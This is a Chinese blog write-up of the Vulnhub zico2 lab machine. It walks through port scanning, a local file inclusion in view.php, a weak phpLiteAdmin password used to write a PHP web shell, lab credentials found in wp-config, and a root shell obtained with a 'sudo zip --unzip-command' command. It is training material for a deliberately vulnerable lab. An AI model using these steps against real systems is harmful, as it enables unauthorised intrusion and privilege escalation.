Vulnhub 靶机 zico2 write up phpLiteAdmin cms写入马+另一处文件包含页面 getshell sudo zip 提权

已于 2022-02-11 11:46:17 修改
阅读量1.8k 收藏 1
点赞数
分类专栏: 靶机学习 文章标签: 安全 linux web安全
于 2021-12-27 10:48:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122167046
版权

Vulnhub 靶机 zico2 write up

0x00 靶机搭建

  • 下载链接

     https://download.vulnhub.com/zico/zico2.ova

  • 运行环境
    VirtualBox
    网络 仅主机 kali 也配置 该网卡

  • 目标
    root 权限 flag 文件

0x01 信息收集

  • ip
    nmap netdiscover 都可
    在这里插入图片描述

探测出为 192.168.56.108

  • 端口服务识别

      nmap -sC -sV -A -p- 192.168.56.108

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

111/tcp open rpcbind 2-4 (RPC #100000)

43985/tcp open status 1 (RPC #100024)

Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5

0x02 漏洞挖掘

思路一:80 http

(1)web 首页+ 目录扫描 看有没有cms
有的话直接 搜对应漏洞
(2)没有的话 看看源码 等 每个功能点 找漏洞 手工+工具

思路二:22ssh 爆破

步骤一:80web探测

(1)开启BP 点击主页各个功能点
在这里插入图片描述
发现一处可疑点 可能存在文件包含

…/etc/passwd
…/…/…/等等 尝试

在这里插入图片描述
发现 果然存在 文件包含

如果 再找到一处上传点 就可以 getshell了
首页没发现其他可利用的功能点

(2) 目录扫描
在这里插入图片描述

(2)挨个访问查看
发现 http://192.168.56.108/dbadmin/

发现目录遍历漏洞

在这里插入图片描述
点击 test_db.php

发现
phpLiteAdmin v1.9.3 cms

在这里插入图片描述
(3) bp爆破弱口令
admin 登录成功
在这里插入图片描述
在这里插入图片描述

(4)翻翻数据库 看没有账号密码
在这里插入图片描述

	root 	34kroot34
	zico  zico2215@

(5)尝试ssh登录 均失败
在这里插入图片描述

步骤二:寻找cms漏洞并利用

(1) 寻找漏洞
searchsploit phpliteadmin
searchsploit -m
在这里插入图片描述
(2)漏洞利用
创建hack.php
在这里插入图片描述

创建a表
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
当前目录下会出现hack.php 直接配合 文件上传 连接即可

/usr/databases/hack.php

在这里插入图片描述

步骤三:文件包含+上传蚁剑连接

http://192.168.56.108/view.php?page=…/…/usr/databases/hack.php
连接成功
在这里插入图片描述

步骤四:翻翻文件

在home 目录下 zico用户 翻到 一个wordpress目录

看看wp-config 配置 会不会有 账号密码 用来ssh登录
在这里插入图片描述
账号 :zico
密码:sWfCsfJSPV9H3AmQzw8

步骤五:尝试ssh登录

在这里插入图片描述
登录成功

步骤六:提权

(1)sudo -l 查看
发现可以不用密码 以root权限执行 /bin/tar 和 /usr/bin/zip
在这里插入图片描述
(2)用zip执行命令

touch 1.txt
sudo zip 1.zip 1.txt -T --unzip-command="sh -c ifconfig"

执行成功
在这里插入图片描述

(3)提权

sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"

在这里插入图片描述
提权成功

在这里插入图片描述

0x03 总结

通过web服务主页发现一处文件包含漏洞,目录扫描到一个phpliteadmin cms,该cms可以直接创建php文件 配合文件包含 getshell,提权通过 sudo -l 配置问题,直接用任意用户以root身份用zip执行系统命令。

LuckyCharm~
关注
专栏目录
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
7Riven's blog
01-29 958
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
phpLiteAdmin v1.9.1
11-02
phpLiteAdmin 是基于 web 的 SQLite 数据库管理工具,支持 SQLite2 和 SQLite3 PHPphpliteadmin.php,只要把些文件上传到服务器上的目录,然后在浏览器中访问,无需安装。可用的操作,功能集。 界面和用户体验和 phpMyAdmin 相似。
vulnhub-symfonos-4(文件包含 & ssh投毒& 命令执行 & linux提权
Ma79328的博客
04-30 730
vulnhub -symfonos4 靶场环境 靶机:172.168.20.133 kali:172.168.20.110 1、打开靶场浏览器访问靶场IP地址 2、扫描目录 使用kali自带目录扫描工具进行目录扫描 dirb http://172.168.20.133/ /usr/share/dirb/wordlists/big.txt -X .php 发现一个php的登陆页面 3、访问atlantis.php页面 使用万能密码绕过登录界面 5.发现文件包含,尝试包含ssh日志文件 #Linux
vulhub php文件包含漏洞复现
weixin_53730939的博客
03-04 376
vulhub php文件包含漏洞复现过程
009 - VulnHub靶机:pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞提权+shellshock漏洞提权
Windmill_的博客
04-27 1773
pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞提权+shellshock漏洞提权
Vulnhub DC9|下载|渗透笔记|knockd敲门服务|文件包含漏洞
qq_60115503的博客
04-19 1349
VulnhubDC9下载靶场提取码:lyq1 将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透 主机发现 首先查看自己属于的网段ip 进行nmap主机发现 nmap -sP -sn 192.168.106.1/24 -sP进行主机发现发送ping包 -sn进行NULL扫描 探测到ip地址为192.168.106.129 所以我们进一步了解该靶场的服务 使用nmap -sV -A -T4 192.168.106......
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
vulnhub/zico2
qq_45230030的博客
04-23 468
下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
vulnhub - zico2(考点: LFI & phpliteadmin & tar/zip 提权 & 版本提权
冬萍子癸水
04-26 571
https://www.vulnhub.com/entry/zico2-1,210/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很常规,22想到可能的ssh登录,80是进web搜集信息 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-...
推荐使用:phpLiteAdmin - 轻量级SQLite数据库管理工具
最新发布
gitblog_00061的博客
06-05 502
推荐使用:phpLiteAdmin - 轻量级SQLite数据库管理工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 phpLiteAdmin是一款基于PHP的轻量级SQLite数据库管理工具,它可以支持SQLite3和SQLite2两种版本。不同于传统的多文件系统,phpLiteAdmin仅仅依赖一个名为phpliteadmin.php的源码文件,无需安装即可直接...
wiki admin.php,phpLiteAdmin是一个用PHP写的基于web的SQLite数据库管理工具
weixin_42339759的博客
03-13 467
phpLiteAdminWhat is phpLiteAdmin?phpLiteAdmin is a web-based SQLite database admin tool written in PHP with support for SQLite3 and SQLite2. Following in the spirit of the flat-file system used by SQL...
【甄选靶场】Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权
人间体佐菲的博客
09-24 871
Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)信息安全,网络安全,渗透测试
phpliteadmin <= 1.9.3 远程php代码执行漏洞测试
weixin_34112208的博客
01-12 1127
漏洞来自:http://www.exploit-db.com/exploits/24044/本文仅仅是简单测试了一下,没有啥技术含量…… 感觉这个还是用于提权获取webshell,因为需要登录phpLiteAdmin,还需要有创建数据库权限。 ...
VulnHub——CH4INRULZ
江左盟的博客
04-13 1317
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
vulnhub zico2
m0_64815693的博客
02-20 1906
vulnhub zico2
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
qjjsqc_phpliteadmin_j4hawv.rar
07-20
php源码实现,这是一个用php脚本语言写的电子商务,Difeye-敏捷的轻量级PHP框架 v1.1.2,Difeye是一款超轻量级PHP框架,主要特点有: 数据库连接做自动主从读写分离配置,适合单机和分布式站点部署; 支持Smarty模板机制,可灵活配置第三方缓存组件; 完全分离页面和动作,仿C#页面加载自动执行Page_Load,可以作为初学者例子代码
sqlite php管理,windows系统下通过phpLiteAdmin管理sqlite数据库
weixin_39936792的博客
03-09 520
不需要服务器,直接运行就可以,非常简单第1步:下载phpLiteAdmin,基于php的sqllite管理工具。地址为:https://bitbucket.org/phpliteadmin/public/wiki/DownloadLinks第2步:解压到C:\Users\username\Desktop\phpLiteAdmin这个目录 ,以此为例第3步:下载phpforwindows,地址为:h...
phpliteadmin_vw6v8.rar
12-15
服务端脚本语言php实现,php-mp4info是一个使用php实现的对mp4数据进行转换格式功能的php的源码程序,初学者不错的参考例子程序
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值